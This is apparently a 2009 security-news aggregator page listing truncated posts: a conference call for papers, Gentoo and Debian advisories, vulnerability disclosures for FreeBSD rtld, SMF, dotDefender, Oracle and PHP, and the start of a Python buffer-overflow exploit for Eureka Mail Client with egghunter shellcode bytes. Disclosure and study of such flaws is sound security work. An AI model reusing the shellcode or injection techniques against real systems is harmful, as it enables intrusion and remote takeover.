The call for papers for the yStS (you Sh0t the Sheriff) conference is now
open!

The 4th edition will be, once again, held in Sao Paulo, Brazil, on May
17th, 2010.


INTRODUCTION

you sh0t the Sheriff is a very unique event dedicated to bringing cutting
edge topics to the top-notch Information Security Community in Brazil.

yStS mixes the highest quality presentations and speakers from all over the
globe, covering diverse topics in information security.

Our goal is to help attendees understand the current state of the
information security world by mixing professionals and topics from
different Infosec segments of the market.

For the most part, yStS is an invite-only event. So, submitting a talk is
certainly a good hack to try to be there, especially if you're local.

Due to the success of previous years' editions, yes, we're keeping the same
format:
* Kicked-back and cool environment
* ... Read more »
Views: 6658 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (7)

** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 "BiG TiME"

"Go fetch your FreeBSD r00tkitz" // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievably simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs for a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like "ping" or "su".
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEA ... Read more »
Views: 6050 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200912-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: OpenSSL: Multiple vulnerabilities
     Date: December 01, 2009
     Bugs: #270305, #280591, #292022
       ID: 200912-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========
... Read more »
Views: 10929 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net
http://labs.elhacker.net/simpleaudit

Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities.

The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today in SMF 1.1.11; visit simplemachines.org for details.

You can review the list of the published vulnerabilities in:
http://code.google.com/p/smf2-review/issues/list



 CSRF, RCE   PHP Remote Code Execution SMF2 www.kernel32
 CSRF   CSRF theme change SMF2, SMF1 www.kernel32
 CSRF   Subforum Category ... Read more »
Views: 40132 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (26)

Problem Description
===================

A remote command execution vulnerability exists in the dotDefender
(3.8-5) Site Management.


dotDefender [1] is a web application firewall (WAF) which 'prevents
hackers from attacking your website.'


Technical Details
=================

The Site Management application of dotDefender is reachable as a web
application (https:site/dotDefender/) on the webserver. After passing the
Basic Auth login you can create/delete applications.
The mentioned vulnerability is in the 'deletesite' implementation and
the 'deletesitename' variable.
Insufficient input validation allows an attacker to inject arbitrary commands.


Delete Site
===========

A normal delete transaction looks as follows:

 POST /dotDefender/index.cgi HTTP/1.1
 Host: 172.16.159.132
 User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; ... Read more »
Views: 6524 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

Hi!
I've just released the working exploit for CTXSYS.DRVXTABC.CREATE_TABLES
injection on Oracle DB 9i/10g (CVE-2009-1991)

You can find the code on my site, http://rawlab.mindcreations.com

In particular,

Classic SQL injection:
http://rawlab.mindcreations.com/codes/exploit/oracle/ctxsys-drvxtabc-create_tables.sql

Cursor injection:
http://rawlab.mindcreations.com/codes/exploit/oracle/ctxsys-drvxtabc-create_tablesV2.sql

On the site you can find exploits for COMPRESSWORKSPACETREE,
REMOVEWORKSPACE and MERGEWORKSPACE injections (SYS.LT) too.

Reg ... Read more »
Views: 6642 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

##################################################################
##################################################################
#          ___   ___  _   _____        __                   _    #
#         / _ \ / _ \| | |  __ \      / _|                 | |   #
#    _ __| | | | | | | |_| |  | | ___| |_ __ _  ___ ___  __| |   #
#   | '__| | | | | | | __| |  | |/ _ \  _/ _` |/ __/ _ \/ _` |   #
#   | |  | |_| | |_| | |_| |__| |  __/ || (_| | (_|  __/ (_| |   #
#   |_|   \___/ \___/ \__|_____/ \___|_| \__,_|\___\___|\__,_|   #
#             ... Read more »
Views: 6350 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)


#2009-017 PHP multiple issues

Description:

PHP, an open source scripting language, suffers from several bugs that may
pose a security risk.

The reported issues have been discovered in several API functions, issues
include buffer overflows, near null reads/writes, arbitrary memory read
and an off-by-one issue. Some of the issues have been previously reported
in older versions of PHP but they either have not been fixed or they were
re-introduced in a later time. The issues have been discovered in both
core and, in some cases, PECL functions/classes/methods.

The following methods have been fixed.

   ibase_pconnect
   ibase_connect
   com_print_typeinfo
   popen
   mssql_connect
   mssql_pconnect
   SplFileObject
   DOMImplementation->createDocumentType
   ... Read more »
Views: 5664 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1942-1                  security@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
November 29, 2009                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wireshark
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)       ... Read more »
Views: 5757 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

================= IUT-CERT =================

Title: Eshopbuilder CMS SQL Injection Vulnerability

Vendor: www.eshopbuilder.ir

Dork: Design by Satcom Co
Type: Input.Validation.Vulnerability (SQL Injection)

Fix: N/A

================== nsec.ir =================

Description:

------------------

Eshopbuilder is an e-shop CMS written in the Persian language. The Eshopbuilder product is vulnerable to SQL injection.


Vulnerability Variant:

------------------
Injection "/home-f.asp","/opinions-f.
Views: 5570 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200911-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: PEAR Net_Traceroute: Command injection
     Date: November 26, 2009
     Bugs: #294264
       ID: 200911-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An input san ... Read more »
Views: 589 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

#!/usr/bin/env python
###########################################################
#
# Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition
# Coded By: k4mr4n_st@yahoo.com
# Found By: k4mr4n (Securitylab.ir Member)
# Tested On: Windows XPSP3 English
# Note: This script sets up a fake SMTP server
# Note: Set the client to this address and check your mail
#
##########################################################

import sys, socket

# egghunter (32 bytes)
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x77\x30\x30\x74" # this is the egg: w00t
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

# windows/shell_bind_tcp - 368 bytes ... Read more »
Views: 7205 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)

Dear List,

I updated the whitepaper with a lot of new information, some
leveraging the vulnerability in other ways that certainly increase
the effectiveness and impact of this vulnerability.

A brief warning to those that think they are safe because they
don't accept client-side renegotiations (server + openssl). I
came across major websites where the SSL loadbalancer in front of the HTTPS
servers was vulnerable. Although the servers were patched it still was
possible to perform the attacks (the loadbalancer merged both
sessions and handed them as one to the webserver).

Updates :
--------
- Added a simple s_client testcase
- Analysis of FTPS (vendors are encouraged to assess)
- HTTPS : Injecting arbitrary _responses_ into the stream
- HT ... Read more »
Views: 581 | Added by: b1zz4rd | Date: 2009-12-03 | Comments (0)